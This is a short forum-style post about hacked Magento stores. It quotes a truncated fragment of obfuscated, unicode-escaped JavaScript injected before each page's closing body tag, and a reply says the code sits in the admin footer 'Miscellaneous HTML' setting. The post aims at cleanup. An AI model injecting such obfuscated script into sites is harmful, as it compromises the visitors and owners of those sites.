Magento installs were hacked and I have having a real hard time determining where the actual code is coming from. The code ends up showing up right before the </body> tag of each page.
Malicious code is posted below
<script>(function(){function LCWEHH(XHFER1){XHFER1=XHFER1[“ \u0073\u0070\u006c\u0069\ u0074″](“”);var F3R4XE=document[“\u0067\u0065\ u0074\u0045\u006c\u0065\u006d\ u0065\u006e\u0074\u0073\u0042\ u0079\u0054\u0061\u0067\u004e\
to remove this code need to go in admin
System->Configuration->Design->Footer->Miscellaneous HTML

you need to remove this code from here